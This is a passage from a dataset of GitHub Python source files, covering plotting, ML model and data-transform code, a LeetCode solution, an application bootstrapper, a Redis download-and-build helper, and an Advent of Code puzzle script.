marker='o')\n\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Z')\n\nplt.show()\n\n\n","repo_name":"papachristoumarios/pcd-plotter","sub_path":"plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"28614146903","text":"\nfrom jetson_containers import PYTHON_VERSION, JETPACK_VERSION\n\nif JETPACK_VERSION.major >= 5:\n TORCH_TRT_VERSION = 'v1.4.0' # build setup has changed > 1.4.0 (still ironing it out on aarch64)\nelse:\n TORCH_TRT_VERSION = 'v1.0.0' # compatability with TensorRT 8.2 and PyTorch 1.10\n \npackage['build_args'] = {\n 'PYTHON_VERSION': PYTHON_VERSION,\n 'JETPACK_MAJOR': JETPACK_VERSION.major,\n 'JETPACK_MINOR': 0 if JETPACK_VERSION.major >= 5 else 6, # only 5.0 and 4.6 are recognized\n 'TORCH_TRT_VERSION': TORCH_TRT_VERSION, \n}\n","repo_name":"dusty-nv/jetson-containers","sub_path":"packages/pytorch/torch_tensorrt/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":1210,"dataset":"github-code","pt":"38"} +{"seq_id":"41156422638","text":"import json\nimport logging\nimport numpy as np\nimport os\nfrom typing import Dict, Tuple\n\nfrom moflow.config import CODE_TO_BOND, DUMMY_CODE, Config\n\n\ndef _onehot(data: np.ndarray, codes_dict: Dict[int, int], dtype=np.float32) -> np.ndarray:\n shape = [len(codes_dict), *data.shape]\n encoded = np.zeros(shape, dtype=dtype)\n for obj_key, code in codes_dict.items():\n encoded[code, data == obj_key] = 1\n return encoded\n\n\ndef encode_nodes(atomic_nums: np.ndarray, config: Config) -> np.ndarray:\n padded_data = np.full(config.max_num_nodes, DUMMY_CODE, dtype=np.uint8)\n padded_data[:len(atomic_nums)] = atomic_nums\n encoded = _onehot(padded_data, config.dataset_config.atomic_to_code).T\n return encoded\n\n\ndef encode_edges(adj: np.ndarray, config: Config) -> np.ndarray:\n padded_data = np.full((config.max_num_nodes, config.max_num_nodes), DUMMY_CODE, dtype=np.uint8)\n n, m = adj.shape\n assert n == m, 'adjecency matrix should be square'\n padded_data[:n, :n] = adj\n # we already store codes in the file - bond types are rdkit objects\n encoded = _onehot(padded_data, {k:k for k in CODE_TO_BOND})\n return encoded\n\n\ndef transform_fn(data: Tuple[np.ndarray], config: Config) -> Tuple[np.ndarray]:\n node, adj, *labels = data\n node = encode_nodes(node, config)\n adj = encode_edges(adj, config)\n return (node, adj, *labels)\n\n\ndef get_val_ids(config: Config, data_dir: str):\n file_path = os.path.join(data_dir, config.dataset_config.valid_idx_file)\n logging.info('loading train/valid split information from: {}'.format(file_path))\n with open(file_path) as json_data:\n data = json.load(json_data)\n\n val_ids = [int(idx)-1 for idx in data]\n return val_ids\n","repo_name":"NVIDIA/DeepLearningExamples","sub_path":"PyTorch/DrugDiscovery/MoFlow/moflow/data/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":11741,"dataset":"github-code","pt":"38"} +{"seq_id":"30334982941","text":"class Solution:\n def isPalindrome(self, head: ListNode) -> bool:\n \n if head == None:\n return True\n \n if head.next == None:\n #len of list is 1, is a palindrome\n return True \n \n curr = head\n slow = curr\n fast = curr\n \n while fast.next and fast.next.next:\n slow = slow.next\n fast = fast.next.next\n \n #slow points to end of first half\n #second half\n second = slow.next\n #we reverse second half\n second = self.reverse(second)\n \n curr_second = second\n ans = True\n \n while curr and second:\n if curr.val != second.val:\n ans = False\n break #end loop\n curr = curr.next\n second = second.next\n \n #end of loop\n #put second half back\n curr_second = self.reverse(curr_second)\n \n #re-attach second half to first half\n slow.next = curr_second\n \n return ans\n\n def reverse(self, head):\n if head == None:\n return curr\n curr = head\n prev = None\n temp = None\n while curr:\n temp = curr.next\n curr.next = prev\n prev = curr\n curr = temp\n return prev\n ","repo_name":"hemangbehl/Data-Structures-Algorithms_practice","sub_path":"leetcode_session3_HB/q234_SinglyLinkedList_Palindrom.py","file_name":"q234_SinglyLinkedList_Palindrom.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"25707556269","text":"import torch\nimport torch.nn as nn\nfrom utils import get_logger\n\nfrom .pose_estimator import PoseEstimator\n\n\nBN_MOMENTUM = 0.1\n\n\nclass PoseResNet(PoseEstimator):\n def __init__(self, num_joints, num_layers=50):\n resnet_spec = {\n 18: (BasicBlock, [2, 2, 2, 2]),\n 34: (BasicBlock, [3, 4, 6, 3]),\n 50: (Bottleneck, [3, 4, 6, 3]),\n 101: (Bottleneck, [3, 4, 23, 3]),\n 152: (Bottleneck, [3, 8, 36, 3]),\n }\n block, layers = resnet_spec[num_layers]\n\n self.inplanes = 64\n self.deconv_with_bias = False\n\n super(PoseResNet, self).__init__(num_joints=num_joints)\n self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, bias=False)\n self.bn1 = nn.BatchNorm2d(64, momentum=BN_MOMENTUM)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n self.layer1 = self._make_layer(block, 64, layers[0])\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2)\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2)\n\n # used for deconv layers\n self.deconv_layers = self._make_deconv_layer(3, [256, 256, 256], [4, 4, 4])\n\n self.final_layer = nn.Conv2d(\n in_channels=256, out_channels=num_joints, kernel_size=1, stride=1, padding=0\n )\n self._logger = get_logger(__name__)\n self._logger.info(\"Init deconv weights from normal distribution\")\n for name, m in self.deconv_layers.named_modules():\n if isinstance(m, torch.nn.ConvTranspose2d):\n self._logger.info(\"Init {}.weight as normal(0, 0.001)\".format(name))\n self._logger.info(\"Init {}.bias as 0\".format(name))\n torch.nn.init.normal_(m.weight, std=0.001)\n if self.deconv_with_bias:\n torch.nn.init.constant_(m.bias, 0)\n elif isinstance(m, torch.nn.BatchNorm2d):\n self._logger.info(\"Init {}.weight as 1\".format(name))\n self._logger.info(\"Init {}.bias as 0\".format(name))\n torch.nn.init.constant_(m.weight, 1)\n torch.nn.init.constant_(m.bias, 0)\n self._logger.info(\"Init final conv weights from normal distribution\")\n for m in self.final_layer.modules():\n if isinstance(m, torch.nn.Conv2d):\n self._logger.info(\"Init {}.weight as normal(0, 0.001)\".format(m))\n self._logger.info(\"Init {}.bias as 0\".format(m))\n torch.nn.init.normal_(m.weight, std=0.001)\n torch.nn.init.constant_(m.bias, 0)\n\n def _make_layer(self, block, planes, blocks, stride=1):\n downsample = None\n if stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n nn.Conv2d(\n self.inplanes,\n planes * block.expansion,\n kernel_size=1,\n stride=stride,\n bias=False,\n ),\n nn.BatchNorm2d(planes * block.expansion, momentum=BN_MOMENTUM),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample))\n self.inplanes = planes * block.expansion\n for _ in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n\n @staticmethod\n def _get_deconv_cfg(deconv_kernel):\n if deconv_kernel == 4:\n padding = 1\n output_padding = 0\n elif deconv_kernel == 3:\n padding = 1\n output_padding = 1\n elif deconv_kernel == 2:\n padding = 0\n output_padding = 0\n else:\n raise NotImplementedError()\n\n return deconv_kernel, padding, output_padding\n\n def _make_deconv_layer(self, num_layers, num_filters, num_kernels):\n if num_layers != len(num_filters):\n self._logger.fatal(\n \"ERROR: num_deconv_layers is different len(num_deconv_filters)\"\n )\n if num_layers != len(num_kernels):\n self._logger.fatal(\n \"ERROR: num_deconv_layers is different len(num_deconv_filters)\"\n )\n\n layers = []\n for i in range(num_layers):\n kernel, padding, output_padding = self._get_deconv_cfg(num_kernels[i])\n\n planes = num_filters[i]\n layers.append(\n nn.ConvTranspose2d(\n in_channels=self.inplanes,\n out_channels=planes,\n kernel_size=kernel,\n stride=2,\n padding=padding,\n output_padding=output_padding,\n bias=self.deconv_with_bias,\n )\n )\n layers.append(nn.BatchNorm2d(planes, momentum=BN_MOMENTUM))\n layers.append(nn.ReLU(inplace=True))\n self.inplanes = planes\n\n return nn.Sequential(*layers)\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n\n x = self.deconv_layers(x)\n x = self.final_layer(x)\n\n return x\n\n\nclass BasicBlock(nn.Module):\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(BasicBlock, self).__init__()\n self.conv1 = nn.Conv2d(\n inplanes, planes, kernel_size=3, stride=stride, padding=1, bias=False\n )\n\n self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = nn.Conv2d(\n planes, planes, kernel_size=3, stride=1, padding=1, bias=False\n )\n\n self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)\n self.conv2 = nn.Conv2d(\n planes, planes, kernel_size=3, stride=stride, padding=1, bias=False\n )\n self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)\n self.conv3 = nn.Conv2d(\n planes, planes * self.expansion, kernel_size=1, bias=False\n )\n self.bn3 = nn.BatchNorm2d(planes * self.expansion, momentum=BN_MOMENTUM)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n","repo_name":"facebookresearch/multi_view_active_learning","sub_path":"pose_estimators/pose_resnet.py","file_name":"pose_resnet.py","file_ext":"py","file_size_in_byte":7625,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"38"} +{"seq_id":"72304283312","text":"import asyncio\nfrom loguru import logger\n\nasync def main():\n await asyncio.gather(task1(), task2())\n\nasync def task1():\n for n in range(5):\n logger.info(n)\n\nasync def task2():\n for n in range(5):\n logger.info(n)\n\n\nasyncio.run(main())","repo_name":"grvstick/async_tutorial","sub_path":"lesson 1/asnyc_print1.py","file_name":"asnyc_print1.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"74744822191","text":"from MetadataManagerCore import config\nfrom plugin.PluginManager import PluginManager\nfrom ApplicationMode import ApplicationMode\nfrom updater.Updater import Updater\nfrom MetadataManagerCore.host.HostProcessController import HostProcessController\nfrom MetadataManagerCore.file.FileHandlerManager import FileHandlerManager\nfrom MetadataManagerCore.service.WatchDogService import WatchDogService\nfrom MetadataManagerCore.service.ServiceManager import ServiceManager\nfrom MetadataManagerCore.filtering.DocumentFilterManager import DocumentFilterManager\nfrom PySide2.QtCore import QThreadPool\nfrom PySide2 import QtCore\nfrom PySide2.QtWidgets import QApplication\nimport asset_manager\nfrom qt_extensions import qt_util\nfrom MetadataManagerCore.mongodb_manager import MongoDBManager\nfrom time import sleep\nfrom datetime import datetime\nimport logging\nfrom enum import Enum\nfrom LoaderWindow import LoaderWindow\nfrom AppInfo import AppInfo\nfrom MainWindowManager import MainWindowManager\nimport os\nimport sys\nfrom MetadataManagerCore.third_party_integrations.deadline.deadline_service import DeadlineService, DeadlineServiceInfo\nfrom MetadataManagerCore.actions.ActionManager import ActionManager\nfrom MetadataManagerCore.environment.EnvironmentManager import EnvironmentManager\nfrom ServiceRegistry import ServiceRegistry\n\n# Do not remove the resources_qrc import. It loads the custom resources/icons for Qt.\nimport resources_qrc\nfrom MetadataManagerCore.task_processor.TaskProcessor import TaskProcessor\nfrom MetadataManagerCore.task_processor.ActionTaskPicker import ActionTaskPicker\nimport time\nfrom ConsoleApp import ConsoleApp\nfrom MetadataManagerCore.file.PrintFileHandler import PrintFileHandler\n\n# Keep the following imports to ensure plugins have access to the modules.\nimport MetadataManagerCore.communication.messaging\n\n# Visual Scripting imports:\nfrom VisualScriptingExtensions.ExtendedVisualScripting import ExtendedVisualScripting\nfrom VisualScriptingExtensions.CodeGenerator import CodeGenerator\nimport VisualScriptingExtensions.mongodb_nodes\nimport VisualScriptingExtensions.document_action_nodes\nimport VisualScriptingExtensions.action_nodes\nimport VisualScriptingExtensions.versioning_nodes\nimport VisualScriptingExtensions.third_party_extensions.deadline_nodes\nimport VisualScriptingExtensions.third_party_extensions.photoshop_nodes\nimport VisualScriptingExtensions.environment_nodes\n\nclass Bootstrapper(object):\n def __init__(self, mode : ApplicationMode, taskFilePath: str, launcherFilename: str, loggerLevel: str = None):\n super().__init__()\n self.mode = mode\n self.taskFilePath = taskFilePath\n self.launcherFilename = launcherFilename\n self.initLogging(loggerLevel)\n\n self.logger.info(f\"Initializing application with mode: {mode} and launcher: {launcherFilename}\")\n\n SETTINGS = QtCore.QSettings(asset_manager.getMainSettingsPath(), QtCore.QSettings.IniFormat)\n \n config.RABBIT_MQ_HOST = SETTINGS.value(\"rabbit_mq_host\")\n config.RABBIT_MQ_USERNAME = SETTINGS.value(\"rabbit_mq_username\")\n config.RABBIT_MQ_PASSWORD = SETTINGS.value(\"rabbit_mq_password\")\n\n self.appInfo = AppInfo()\n self.appInfo.company = SETTINGS.value(\"company\")\n self.appInfo.appName = SETTINGS.value(\"app_name\")\n self.appInfo.mode = mode\n self.mongodbHost = SETTINGS.value(\"mongodb_host\")\n self.dbName = SETTINGS.value(\"db_name\")\n self.hostProcessController = None\n self.serviceManager = None\n self.dbManager = None\n self.serviceRegistry = ServiceRegistry()\n self.serviceRegistry.appInfo = self.appInfo\n\n self.restartRequested = False\n self.updater = None\n\n dbInitTimeout = None\n if self.mode == ApplicationMode.GUI:\n self.app = QApplication([])\n self.app.setAttribute(QtCore.Qt.AA_EnableHighDpiScaling)\n self.loaderWindow = LoaderWindow(self.app, self.appInfo, self.logger, self)\n elif self.mode == ApplicationMode.Console:\n dbInitTimeout = 60.0\n self.consoleApp = ConsoleApp(self.appInfo, self.serviceRegistry, taskFilePath=self.taskFilePath, initTimeout = 240.0)\n \n QThreadPool.globalInstance().start(qt_util.LambdaTask(self.initDataBaseManager, dbInitTimeout))\n\n def requestRestart(self):\n self.restartRequested = True\n self.mainWindowManager.close()\n\n def run(self):\n if self.mode == ApplicationMode.GUI:\n status = self.app.exec_()\n elif self.mode == ApplicationMode.Console:\n # Wait for initialization completion:\n status = self.consoleApp.exec()\n self.logger.info(\"Quitting application...\")\n self.shutdown()\n else:\n status = None\n self.logger.error(f'Unknown Mode: {self.mode}')\n\n return status\n\n def shutdown(self):\n for service in self.serviceRegistry.services:\n try:\n service.shutdown\n hasShutdownFunction = True\n except:\n hasShutdownFunction = False\n\n if hasShutdownFunction: \n service.shutdown()\n\n if self.updater:\n self.updater.shutdown()\n\n if self.appInfo.initialized:\n self.save()\n\n self.dbManager.disconnect()\n\n QtCore.QThreadPool.globalInstance().waitForDone()\n\n def initLogging(self, loggerLevel: str):\n logFilename = asset_manager.getLogFilePath()\n if not os.path.isdir(os.path.dirname(logFilename)):\n os.makedirs(os.path.dirname(logFilename))\n\n strToLoggerLevel = {\n 'debug': logging.DEBUG,\n 'info': logging.INFO,\n 'warning': logging.WARNING,\n 'error': logging.ERROR,\n 'critical': logging.CRITICAL\n }\n\n if loggerLevel:\n loggerLevel = strToLoggerLevel.get(loggerLevel.lower())\n\n if not loggerLevel:\n loggerLevel = logging.INFO\n\n fileHandler = logging.FileHandler(logFilename)\n fileHandler.setLevel(loggerLevel)\n\n consoleHandler = logging.StreamHandler()\n consoleHandler.setLevel(loggerLevel)\n\n logging.basicConfig(format='%(asctime)s %(name)s:%(threadName)s %(levelname)s: %(message)s', \n datefmt='%H:%M:%S', handlers=[fileHandler, consoleHandler], level=logging.DEBUG)\n\n self.logger = logging.getLogger(__name__)\n\n def initDataBaseManager(self, timeout=None):\n connected = False\n self.dbManager = MongoDBManager(self.mongodbHost, self.dbName)\n\n tStart = time.time()\n while not connected and (timeout == None or time.time() - tStart < timeout) and not self.appInfo.applicationQuitting:\n self.logger.info(\"Connecting to database...\")\n\n try:\n self.dbManager.connect()\n self.logger.info(\"Connected.\")\n connected = True\n except Exception as e:\n if self.appInfo.applicationQuitting:\n return\n\n print(f\"Error: {str(e)}\")\n sleep(2)\n self.logger.info(\"Failed to connect. Retrying...\")\n sleep(1)\n continue\n\n if not connected:\n qt_util.runInMainThread(self.onDBManagerConnectionTimeout)\n return\n \n self.onDBManagerConnected()\n\n def onDBManagerConnectionTimeout(self):\n if self.app:\n self.shutdown()\n self.app.quit()\n\n def initServices(self):\n self.serviceRegistry.deadlineService = DeadlineService(None)\n self.serviceRegistry.services.append(self.serviceRegistry.deadlineService)\n\n self.serviceRegistry.actionManager = ActionManager()\n self.serviceRegistry.services.append(self.serviceRegistry.actionManager)\n \n self.serviceRegistry.environmentManager = EnvironmentManager()\n self.serviceRegistry.services.append(self.serviceRegistry.environmentManager)\n\n self.serviceRegistry.dbManager = self.dbManager\n self.serviceRegistry.services.append(self.dbManager)\n\n self.serviceRegistry.documentFilterManager = DocumentFilterManager(self.serviceRegistry.dbManager)\n self.serviceRegistry.services.append(self.serviceRegistry.documentFilterManager)\n\n self.serviceRegistry.codeGenerator = CodeGenerator(self.serviceRegistry.actionManager, self.serviceRegistry.documentFilterManager)\n self.serviceRegistry.services.append(self.serviceRegistry.codeGenerator)\n\n self.serviceRegistry.taskProcessor = TaskProcessor()\n actionTaskPicker = ActionTaskPicker(self.serviceRegistry.actionManager, self.serviceRegistry.documentFilterManager)\n self.serviceRegistry.taskProcessor.addTaskPicker(actionTaskPicker)\n self.serviceRegistry.services.append(self.serviceRegistry.taskProcessor)\n\n VisualScriptingExtensions.mongodb_nodes.DB_MANAGER = self.dbManager\n VisualScriptingExtensions.environment_nodes.ENVIRONMENT_MANAGER = self.serviceRegistry.environmentManager\n VisualScriptingExtensions.third_party_extensions.deadline_nodes.DEADLINE_SERVICE = self.serviceRegistry.deadlineService\n\n self.serviceManager = ServiceManager(self.dbManager, self.hostProcessController, self.serviceRegistry, self.mode == ApplicationMode.Console)\n self.serviceRegistry.serviceManager = self.serviceManager\n self.serviceRegistry.services.append(self.serviceManager)\n self.serviceManager.registerServiceClass(WatchDogService)\n\n self.fileHandlerManager = FileHandlerManager()\n self.serviceRegistry.fileHandlerManager = self.fileHandlerManager\n self.serviceRegistry.services.append(self.fileHandlerManager)\n\n pluginFolder = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"plugins\")\n privatePluginFolder = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"private\", \"plugins\")\n self.serviceRegistry.pluginManager = PluginManager([pluginFolder, privatePluginFolder], self.serviceRegistry, self.appInfo)\n self.serviceRegistry.services.append(self.serviceRegistry.pluginManager)\n\n visualScriptingSaveDataFolder = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"VisualScripting_SaveData\")\n visualScriptingPrivateSaveDataFolder = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"private\", \"VisualScripting_SaveData\")\n self.serviceRegistry.visualScripting = ExtendedVisualScripting([visualScriptingSaveDataFolder, visualScriptingPrivateSaveDataFolder], self.serviceRegistry.actionManager, \n self.serviceRegistry.documentFilterManager,\n self.serviceRegistry.codeGenerator)\n self.serviceRegistry.services.append(self.serviceRegistry.visualScripting)\n\n def onDBManagerConnected(self):\n self.initHostProcessController()\n\n self.initServices()\n self.load()\n self.appInfo.initialized = True\n\n if self.mode == ApplicationMode.GUI:\n qt_util.runInMainThread(self.loaderWindow.hide)\n qt_util.runInMainThread(self.setupMainWindowManager)\n qt_util.runInMainThread(self.setupUpdater)\n \n def setupUpdater(self):\n self.updater = Updater(self.launcherFilename, self, self.mainWindowManager.window) if self.launcherFilename else None\n\n def initHostProcessController(self):\n self.hostProcessController = HostProcessController(self.dbManager)\n self.hostProcessController.thisHost.onRequestedApplicationClose.subscribe(self.onRequestedApplicationClose)\n self.serviceRegistry.hostProcessController = self.hostProcessController\n self.serviceRegistry.services.append(self.hostProcessController)\n QThreadPool.globalInstance().start(qt_util.LambdaTask(self.hostProcessController.run))\n\n def onRequestedApplicationClose(self):\n if self.mainWindowManager:\n qt_util.runInMainThread(self.mainWindowManager.close)\n\n def setupMainWindowManager(self):\n self.mainWindowManager = MainWindowManager(self.app, self.appInfo, self.serviceRegistry, self)\n self.serviceRegistry.mainWindowManager = self.mainWindowManager\n \n settings = QtCore.QSettings(self.appInfo.company, self.appInfo.appName)\n self.serviceRegistry.pluginManager.load(settings, self.dbManager)\n self.mainWindowManager.pluginManagerViewer.loadPluginsFolders()\n self.serviceRegistry.visualScripting.load(settings, self.dbManager)\n\n self.mainWindowManager.show()\n\n def load(self, settings = None):\n if settings == None:\n settings = QtCore.QSettings(self.appInfo.company, self.appInfo.appName)\n \n for service in self.serviceRegistry.services:\n # Skip PluginManager if in GUI mode. It will be loaded after the main window manager is initialized.\n if self.mode == ApplicationMode.GUI:\n if isinstance(service, PluginManager):\n continue\n\n if isinstance(service, ExtendedVisualScripting):\n continue\n\n try:\n service.load\n hasLoadFunc = True\n except:\n hasLoadFunc = False\n\n if hasLoadFunc:\n service.load(settings, self.dbManager)\n\n def save(self, settings = None):\n if self.appInfo.mode == ApplicationMode.Console:\n return\n \n self.logger.info(\"Saving...\")\n if settings == None:\n settings = QtCore.QSettings(self.appInfo.company, self.appInfo.appName)\n\n for service in self.serviceRegistry.services:\n try:\n service.save\n hasSaveFunc = True\n except:\n hasSaveFunc = False\n\n if hasSaveFunc: \n service.save(settings, self.dbManager)\n\n self.logger.info(\"Saving completed.\")","repo_name":"compix/MetadataManager","sub_path":"Bootstrapper.py","file_name":"Bootstrapper.py","file_ext":"py","file_size_in_byte":14099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"20462693703","text":"\"\"\"\nWritten by Phani Pavan k .\nuse this code as per gplv3 guidelines.\n\"\"\"\nimport pgrep\nimport re\nimport shutil\nimport os\nimport tarfile\nimport subprocess as sp\nfrom tqdm.auto import tqdm\nimport requests as req\nfrom .ui import *\nimport sys\nfrom threading import Thread\nfrom multiprocessing import Process\nimport asyncio\nimport time\nREDIS_STABLE_URL = \"http://download.redis.io/redis-stable.tar.gz\"\n\n\nclass RedisServer:\n def __init__(self) -> None:\n self.proc = None\n self.procID = None\n\n @staticmethod\n def _makeLogFolder():\n os.makedirs('redis_server/installLogs', exist_ok=True)\n # ? Implement saving logs to this folder.\n\n @staticmethod\n def _downloadRedis():\n os.makedirs('redis_server', exist_ok=True)\n lst = os.listdir('./redis_server')\n if 'redis-stable.tar.gz' in lst:\n debug('Redis Source already found, skipping download', Log.WRN)\n else:\n debug('Downloading Redis Stable Source')\n with req.get(REDIS_STABLE_URL, stream=True) as r:\n size = int(r.headers.get('Content-Length'))\n with tqdm.wrapattr(r.raw, 'read', total=size, desc='') as data:\n with open('redis_server/redis-stable.tar.gz', 'wb') as fil:\n shutil.copyfileobj(data, fil)\n debug('Download Done', Log.SUC)\n\n @staticmethod\n def _findSource():\n lst = os.listdir('./redis_server')\n if 'redis-stable' in lst:\n debug('Redis Already Extracted', Log.WRN)\n else:\n debug('Extracting Source')\n tarfile.open(\n 'redis_server/redis-stable.tar.gz').extractall('./redis_server/')\n debug('Done Extracting Source', Log.SUC)\n\n @staticmethod\n def _build():\n coresToBuild = 1 if os.cpu_count() is not None else os.cpu_count()//3\n if 'src' in os.listdir('redis_server/redis-stable') and 'redis-server' in os.listdir('./redis_server/redis-stable/src'):\n # os.chdir('redis_server/redis-stable')\n debug('Redis Already Built', Log.WRN)\n else:\n debug('Running Redis Build On ' +\n str(coresToBuild+1 if type(os.cpu_count()) is int else 1)+' Cores')\n anim = Loader(desc='Building ').start()\n os.chdir('redis_server/redis-stable')\n x = sp.run(['make -j'+str(coresToBuild+1 if type(os.cpu_count()) is int else 1)],\n capture_output=True, text=True, shell=True)\n anim.stop()\n os.chdir('../../')\n debug('Done Building', Log.SUC)\n\n @staticmethod\n def _setupLink():\n if 'redis-server' in os.listdir('./redis_server'):\n debug('Redis Already setup', Log.WRN)\n else:\n debug('Setting up Redis Server')\n y = sp.run(['chmod +x ./redis_server/redis-stable/src/redis-server'],\n shell=True, text=True, capture_output=True)\n # sp.run(['ls'])\n y = sp.run(['ln -s ./redis-stable/src/redis-server ./redis_server/redis-server'],\n shell=True, text=True, capture_output=True)\n y = sp.run(['chmod +x ./redis_server/redis-server'],\n shell=True, text=True, capture_output=True)\n debug('Redis Set', Log.SUC)\n\n @staticmethod\n def _verify():\n debug('Veryfying Redis Install')\n # sp.run(['ls', '-l'])\n # sp.run(['pwd'])\n z = sp.run(['./redis_server/redis-server --version'],\n shell=True, capture_output=True, text=True)\n regexp = re.search('Redis server v=(.*) sha', z.stdout)\n if regexp.group(0):\n debug('Redis Version '+regexp.group(1)+' Found')\n debug('Redis working fine', Log.SUC)\n return 1\n else:\n return 0\n\n def _setProcID(self):\n if self.procID == None and self.proc != None:\n try:\n self.procID = pgrep.pgrep(\n r\"-f 'redis_server\\/redis-server \\*\\:6379'\")[0]\n except IndexError as e:\n debug(\"Unable to set PID\", Log.ERR)\n\n def install(self, saveLogs: bool = False, ):\n if sys.platform.lower() != 'linux':\n debug('OS not Linux, install redis manually', Log.ERR)\n debug(\n 'Support for intalling on other OSs will be implemented in the future.', Log.WRN)\n return\n if saveLogs:\n RedisServer._makeLogFolder()\n RedisServer._downloadRedis()\n RedisServer._findSource()\n RedisServer._build()\n RedisServer._setupLink()\n return RedisServer._verify()\n\n async def _startServer(self, threading: bool = False):\n def runServer():\n sp.run('./redis_server/redis-server',\n capture_output=True, text=True, shell=False)\n\n if threading:\n self.proc = Thread(target=runServer)\n else:\n self.proc = Process(target=runServer)\n self.proc.start()\n while not self.proc.is_alive():\n pass\n # self.procID = self.proc.pid\n # print('new: {} old: {}'.format(self.procID, pgrep.pgrep(\n # r\"-f 'redis_server\\/redis-server \\*\\:6379'\")[0]))\n self._setProcID()\n\n def startServer(self):\n if self.proc is None:\n asyncio.run(self._startServer())\n time.sleep(0.5)\n else:\n debug('Redis Server already running manually', Log.WRN)\n\n def stopServer(self):\n if self.proc is None:\n debug('Redis Server not running', Log.WRN)\n else:\n self._setProcID()\n self.proc.terminate()\n if self.procID != None:\n os.kill(self.procID, 15)\n anim = Loader(desc='Stopping Redis Server ').start()\n while self.proc.is_alive():\n pass\n time.sleep(0.5)\n anim.stop()\n # if self.procID\n debug('Redis Server stopped', Log.SUC)\n print('\\n')\n self.proc = None\n self.procID = None\n\n\nif __name__ == \"__main__\":\n a = RedisServer()\n a.install()\n a.startServer()\n print(a.procID)\n time.sleep(5)\n a.stopServer()\n","repo_name":"Narasimha1997/redis-pydict","sub_path":"redis_pydict/install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":6271,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"38"} +{"seq_id":"72299689711","text":"import time\n\ndef read_input():\n with open('input.txt') as f: \n grid=[]\n lines = f.readlines()\n for line in lines:\n grid.append(list(map(int,line.strip())))\n return grid\n f.close()\n\ndef find_visible(grid,grid_rot):\n h = len(grid)\n w = len(grid[0])\n sol=0\n\n for y in range(1,(h-1)):\n \n for x in range(1,(w-1)):\n if grid[y][x] > max(grid[y][0:x]) or grid[y][x] > max(grid[y][x+1:len(grid[y])]):\n sol+= 1\n else:\n if grid_rot[x][y] > max(grid_rot[x][0:y]) or grid_rot[x][y] > max(grid_rot[x][y+1:len(grid_rot[x])]):\n sol+= 1\n return sol\n\ndef find_scenic_score(grid):\n h = len(grid)\n w = len(grid[0])\n\n scores=[]\n sol=0\n for y in range(1,(h-1)):\n for x in range(1,(w-1)):\n l=0\n r=0\n u=0\n d=0\n #Look left\n for i in range(x-1,-1,-1):\n if grid[y][i]>=grid[y][x]:\n l+=1\n break\n else:\n l+=1 \n\n #Look right\n for i in range(x+1,w):\n if grid[y][i]>=grid[y][x]:\n r+=1\n break\n else:\n r+=1 \n\n #Look up\n for i in range(y-1,-1,-1):\n if grid[i][x]>=grid[y][x]:\n u+=1\n break\n else:\n u+=1 \n\n #Look right\n for i in range(y+1,h):\n if grid[i][x]>=grid[y][x]:\n d+=1\n break\n else:\n d+=1 \n\n #Look down\n print(\"number: %d , x: %d, y: %d, l: %d, r: %d, u: %d, d: %d\"%(grid[y][x],x,y,l,r,u,d))\n\n scores.append(l*r*u*d)\n print(scores)\n return max(scores)\n\nif __name__ == \"__main__\":\n start_time = time.time()\n grid = read_input()\n grid_rot=list(zip(*grid))\n\n# Part one\n 